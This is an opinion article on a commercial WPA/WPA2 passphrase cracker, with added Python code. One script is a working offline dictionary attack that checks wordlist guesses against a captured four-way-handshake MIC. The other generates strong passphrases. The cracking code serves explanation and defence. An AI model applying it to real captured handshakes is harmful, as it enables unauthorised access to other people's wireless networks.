For sale: Wi-Fi encryption cracker

The Russian company Elcomsoft is now selling software that tests the strength of WPA and WPA2 PSK passphrases. There is no need to panic, but we still need to look at the motive behind the product and the repercussions it may have down the road.

Elcomsoft is selling Wireless Security Auditor, a WPA/WPA2 "encryption cracker" that in fact recovers PSK passphrases by guessing them rather than by breaking the cipher. I'm not that worried, because it's an expensive endeavor with limited usefulness. Let's take a look at three reasons why I say that:

  • Prove RoI -- The application costs more than $600 US.
  • Unique hardware -- A custom high-end PC with three or four graphics cards is required. (I'll explain why later.)
  • PSK requirement -- The application runs a dictionary attack against a captured WPA/WPA2 four-way handshake, which succeeds only if the passphrase is in the attacker's wordlist, i.e. only if a simple PSK passphrase was chosen.

The first two would be show-stoppers for most of us, but Elcomsoft isn't targeting us. They feel this product will be beneficial to larger corporations that employ wireless networks, as stated on their Web site:

"A single weak link poses a valid security threat to the entire corporate network. Wireless (Wi-Fi) networks can provide sufficient security if configured properly and accompanied by an adequate password policy. Elcomsoft Wireless Security Auditor exposes security problems in your wireless network to allow network administrators to take appropriate measures and adopt a proper password policy."

Where's the logic?

I'm having a difficult time understanding Elcomsoft's rationale for selling this product. I'm sorry, but the cynic in me sees only two possible explanations: Either Elcomsoft doesn't understand the corporate wireless environment, or Elcomsoft wants to absolve itself of any responsibility if the product is used illegally. See if my logic makes sense to you.


If corporate entities are concerned about security, they will be running 802.11i with 802.1X (EAP) authentication, where every user logs in with individual credentials, and will not be using a shared PSK passphrase at all. Furthermore, having to set up each individual computer with the same PSK passphrase is not very efficient when there are hundreds of workstations. So most corporations with wireless networks will have no need for Wireless Security Auditor to check for weak passphrases.

Small businesses?

If large corporations don't need Wireless Security Auditor, then who does? Small businesses or SOHO operations that aren't using 802.11i/802.1X for authentication might need it, but I doubt it. It's been my experience that small businesses are even more sensitive to RoI, and in the "current economic climate" most small-business owners are not inclined to spend money on what they consider reactive solutions that hurt the bottom line.

So, who then?

I'm not really sure. The individual or organization that would want an application like this already has it or is sophisticated enough to build it on their own. This attack isn't new, as can be seen from Robert Moskowitz's article "Weakness in Passphrase Choice in WPA Interface," which was published in November of 2003.

One reason to buy

I must admit that Elcomsoft has all but eliminated the main drawback of dictionary attacks: the time they take. Every guess at a WPA/WPA2 passphrase has to be run through 4,096 rounds of HMAC-SHA1 just to derive the key, so a dictionary attack normally takes so long that only the most determined attackers would bother with it. It was quite ingenious of Elcomsoft to harness the processing power of multiple high-end graphics cards, and they have even applied for a patent on what they call GPU acceleration:

"ElcomSoft has pioneered many software innovations that have made it easier to recover passwords protecting various types of resources. For the first time in the industry, the company's patent-pending GPU acceleration makes its way into Wi-Fi password recovery, reducing the time required to recover Wi-Fi passwords up to a hundred times. Supporting up to four NVIDIA boards such as GeForce 8, 9, and 200, as well as ATI video cards such as RADEON HD 3000 Series and up, Elcomsoft Wireless Security Auditor allows building servers with supercomputer performance at a fraction of the price."
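To make the dictionary attack mentioned in the third bullet and the "4,096 rounds per guess" cost concrete, here is an added example that is not part of the original article and not Elcomsoft's code. It derives the WPA/WPA2 PMK with PBKDF2-HMAC-SHA1 exactly as 802.11i specifies, expands it to the PTK, and checks each wordlist candidate against the MIC of a captured four-way-handshake message, which is how any passphrase cracker decides a guess is correct. The SSID, MAC addresses, nonces, EAPOL frame body and wordlist are all constructed for the example; the only real-world value is the 802.11i test vector ("password" / "IEEE").

```python
import hashlib
import hmac
import time
from typing import Optional, Sequence

# --- Constructed handshake parameters (hypothetical values for this example) ---
SSID = "ExampleNet"
AP_MAC = bytes.fromhex("001122334455")      # hypothetical access point address
STA_MAC = bytes.fromhex("66778899aabb")     # hypothetical client address
ANONCE = bytes(range(0, 32))                # hypothetical authenticator nonce
SNONCE = bytes(range(32, 64))               # hypothetical supplicant nonce
# Hypothetical EAPOL-Key message 2 body with its 16-byte MIC field already zeroed,
# which is the input the MIC is computed over.
EAPOL_MSG2_ZERO_MIC = b"\x01\x03\x00\x75\x02\x01\x0a" + b"\x00" * 114

# Constructed wordlist; real attacks use lists with millions of entries.
WORDLIST = ["password", "letmein", "12345678", "sunshine", "football", "qwertyui"]


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits), per 802.11i.
    The 4,096 iterations are what make every guess expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(N)||max(N))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_zero_mic: bytes) -> bytes:
    """WPA2 (AKM 2) key MIC: HMAC-SHA1 under the KCK (first 16 bytes of the PTK), truncated to 128 bits."""
    return hmac.new(kck, eapol_zero_mic, hashlib.sha1).digest()[:16]


def mic_for_passphrase(passphrase: str) -> bytes:
    """Full per-guess pipeline: passphrase -> PMK -> PTK -> KCK -> MIC over the captured frame."""
    pmk = wpa_pmk(passphrase, SSID)
    kck = wpa_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_MSG2_ZERO_MIC)


def dictionary_attack(captured_mic: bytes, wordlist: Sequence[str]) -> Optional[str]:
    """Return the candidate whose MIC matches the captured one, or None if the list is exhausted."""
    for candidate in wordlist:
        if hmac.compare_digest(mic_for_passphrase(candidate), captured_mic):
            return candidate
    return None


def guesses_per_second(samples: int = 20) -> float:
    """Rough single-core throughput of the pipeline above, for sizing an attack."""
    start = time.perf_counter()
    for i in range(samples):
        mic_for_passphrase("bench%04d" % i)
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    # Simulate the capture: the legitimate client used a weak passphrase that is in the list.
    captured = mic_for_passphrase("sunshine")
    print("recovered passphrase:", dictionary_attack(captured, WORDLIST))
    # A passphrase that is not in the list is simply never found.
    print("random passphrase:", dictionary_attack(mic_for_passphrase("Qm7#vL9x!pR2kW"), WORDLIST))
    rate = guesses_per_second()
    print("approx. %.0f guesses/s on one CPU core; a 1,000,000-word list takes about %.0f s"
          % (rate, 1_000_000 / rate))
```

The handshake capture itself is the part this example simulates rather than performs: the attacker records the EAPOL frames from a client joining the network and then needs nothing further from the air. Everything after that is offline computation, which is exactly where GPUs help.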

What now?

Now that we understand what's available, I'd like to share my concerns. It's obvious that if something like this fell into the wrong hands it could cause a lot of hardship. I realize the cost is prohibitive for most, but we have to take underground trafficking of software into consideration. How long before Wireless Security Auditor is made available on a BitTorrent channel?

Once that happens I start to worry about unsuspecting consumers who are using simple passwords or even the default password that came with the Wi-Fi equipment. I can hear their arguments now:

"You told me that my Wi-Fi system would be secure if I used WPA/WPA2. So I went through all that trouble upgrading and now you are telling me that I have to come up with a complicated passphrase that's hard to remember."

Sound familiar? I get frustrated too, but there's precious little we can do other than to continue to be vigilant and help each other.

Final thoughts

I don't want it to seem like I'm crying wolf, because there's no need to be overly concerned. Please just ensure that your Wi-Fi passphrases are long and not built from dictionary words, which takes this attack vector off the table. In my next article, I'm going to discuss some options that can simplify the whole process of using complicated passphrases. I'd also like to hear about any tips that you have in that regard.
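As an added example (not from the original article) of what "complicated" has to mean for WPA/WPA2, the script below generates passphrases two ways, checks them against the 802.11i passphrase rules (8 to 63 printable ASCII characters), and works out how many years a guess-everything attack would need at a given guessing rate. The small word list and the guessing rates are constructed for illustration.

```python
import math
import secrets
import string

# Constructed word list for the word-based generator (hypothetical; a real list has thousands of words).
WORDS = ["anchor", "basil", "copper", "dune", "ember", "falcon", "garnet", "harbor",
         "iris", "juniper", "kestrel", "lantern", "meadow", "nickel", "orchid", "pebble"]

WPA_MIN_LEN, WPA_MAX_LEN = 8, 63
CHAR_POOL = string.ascii_letters + string.digits + string.punctuation  # 94 printable ASCII characters

SECONDS_PER_YEAR = 3600 * 24 * 365


def is_valid_wpa_passphrase(passphrase: str) -> bool:
    """802.11i passphrases are 8 to 63 characters, each printable ASCII (0x20 to 0x7E)."""
    return (WPA_MIN_LEN <= len(passphrase) <= WPA_MAX_LEN
            and all(0x20 <= ord(c) <= 0x7E for c in passphrase))


def random_char_passphrase(n_chars: int = 20) -> str:
    """Uniformly random characters from the printable ASCII pool, using a CSPRNG."""
    return "".join(secrets.choice(CHAR_POOL) for _ in range(n_chars))


def random_word_passphrase(n_words: int = 6, sep: str = "-") -> str:
    """Diceware-style passphrase: easier to type into a router than random symbols."""
    return sep.join(secrets.choice(WORDS) for _ in range(n_words))


def entropy_bits(pool_size: int, picks: int) -> float:
    """Entropy of `picks` independent uniform choices from `pool_size` items."""
    return picks * math.log2(pool_size)


def years_to_exhaust(bits: float, guesses_per_second: float) -> float:
    """Worst-case time to try every possibility at the given rate."""
    return 2 ** bits / guesses_per_second / SECONDS_PER_YEAR


if __name__ == "__main__":
    for label, passphrase, bits in [
        ("8 lowercase letters", "sunshine", entropy_bits(26, 8)),
        ("20 random characters", random_char_passphrase(20), entropy_bits(len(CHAR_POOL), 20)),
        ("6 words from a 16-word list", random_word_passphrase(6), entropy_bits(len(WORDS), 6)),
    ]:
        # Hypothetical rate: 1,000,000 guesses per second from a GPU-equipped cracking box.
        print("%-28s valid=%s bits=%5.1f years@1M/s=%.3g"
              % (label, is_valid_wpa_passphrase(passphrase), bits, years_to_exhaust(bits, 1e6)))
```

The point of the table this prints is the gap between the first line and the other two: a passphrase that is a single dictionary word falls to a wordlist in seconds no matter how fast the hardware is, while a random 20-character passphrase would not fall to exhaustive search at any rate a graphics card can reach. Note that a random word passphrase is only as strong as the size of the list it is drawn from; the 16-word list here is for illustration, and a real one should have thousands of entries.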
